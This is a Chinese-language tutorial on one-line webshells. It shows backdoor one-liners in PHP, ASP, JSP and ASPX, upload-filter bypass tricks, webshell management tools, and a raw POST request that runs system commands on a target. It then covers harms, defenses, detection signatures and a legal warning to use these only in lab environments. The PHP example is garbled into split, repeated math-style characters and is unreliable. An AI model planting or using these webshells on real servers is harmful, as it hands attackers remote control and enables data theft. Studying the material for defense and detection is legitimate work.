一、一句话木马的完整形态与上传方式

1. 典型代码示例

PHP:`<?php @eval(𝑃𝑂𝑆𝑇[′𝑎′]);?>‘−‘@‘:抑制错误输出,避免暴露痕迹−‘𝑒𝑣𝑎𝑙()‘:将字符串作为𝑃𝐻𝑃代码执行−‘
𝑃
𝑂
𝑆
𝑇
[

𝑎

]
)
;
?
>



@

















𝑒
𝑣
𝑎
𝑙
(
)








𝑃
𝐻
𝑃






_POST['a']`:接收POST请求中名为`a`的参数值作为待执行代码 - 其他语言变体:

ASP:`<%execute(request("a"))%>` 

JSP:<%Runtime.getRuntime().exec(request.getParameter("a"));%>` 

ASPX:`<%@ Page Language="Jscript"%><%eval(Request.Item["a"])%>`

2. 上传途径(利用漏洞)

文件上传漏洞:绕过网站对文件类型、后缀、内容的校验(如修改后缀为`.jpg/.phtml`、伪造图片头、双写后缀等)

代码注入漏洞:通过SQL注入、XSS等间接写入文件 - 编辑器漏洞:利用FCKeditor、KindEditor等编辑器的上传缺陷

其他入口:模板注入、插件上传、备份恢复等 

二、发号施令:连接与控制方式  1. 工具类连接(主流方式)

蚁剑 (AntSword) | 开源、跨平台、功能丰富,支持文件管理、命令执行、数据库管理 | 主流Webshell管理工具,适合学习与实战

菜刀 (Chopper) 经典老牌工具,界面简洁,操作直观 | 早期广泛使用,兼容性强

哥斯拉 (Godzilla)加密传输、免杀能力强,支持多种脚本类型 | 对抗WAF/安全设备的场景

冰蝎 (Behinder)动态加密、流量混淆,支持内存马,隐蔽性极强 | 高防护环境下的渗透测试 |

2. 手动连接(无工具时) 直接构造POST请求: http POST /shell.php HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded a=system('whoami');  或通过浏览器插件、Burp Suite等工具发送请求,执行系统命令、读写文件。

三、核心原理与危害  1. 核心原理 一句话木马本质是代码执行后门:接收外部可控输入(GET/POST/COOKIE等)调用`eval()`/`execute()`等危险函数,将输入作为代码执行 - 攻击者借此获得服务器的Webshell权限

2. 主要危害 - 读取/篡改/删除网站文件,篡改页面内容 - 执行系统命令,控制服务器操作系统 - 窃取数据库账号密码、用户数据等敏感信息 - 植入更隐蔽的后门(如内存马),实现持久化控制 - 横向渗透内网,扩大攻击范围 

四、防御与检测手段 1. 防御措施 文件上传控制:严格校验文件类型(白名单而非黑名单)、后缀名、文件内容,限制上传目录执行权限 危险函数禁用:在PHP配置中禁用`eval()`、`assert()`、`system()`等高危函数,WAF部署:使用Web应用防火墙拦截恶意请求与代码注入 - 权限最小化:Web服务进程仅拥有必要的文件读写权限,避免提权 日志审计:监控文件上传、代码执行等异常行为 2. 检测方法 - 扫描代码中是否存在`eval($_POST[...])`等特征字符串 - 检查上传目录是否存在可疑脚本文件 - 分析流量中是否存在POST参数包含代码执行特征 , 使用安全工具(如D盾、河马)进行Webshell查杀。

 五、法律与伦理提醒 严禁在未获得授权的系统上使用一句话木马,此类行为属于网络攻击,违反《网络安全法》《刑法》等法律法规,将承担刑事责任。仅可在**自有靶场(如DVWA、Vulhub)中用于学习与研究。

总结归纳 一句话木马是极简的Web后门脚本,核心是“接收输入→执行代码”,通过上传漏洞植入后,配合蚁剑/菜刀等工具实现远程控制。它隐蔽性强、危害极大,防御需从上传控制、函数禁用、权限管理等多维度入手。合法合规是前提,学习需在授权环境中进行。 
 

Logo

openEuler 是由开放原子开源基金会孵化的全场景开源操作系统项目,面向数字基础设施四大核心场景(服务器、云计算、边缘计算、嵌入式),全面支持 ARM、x86、RISC-V、loongArch、PowerPC、SW-64 等多样性计算架构

更多推荐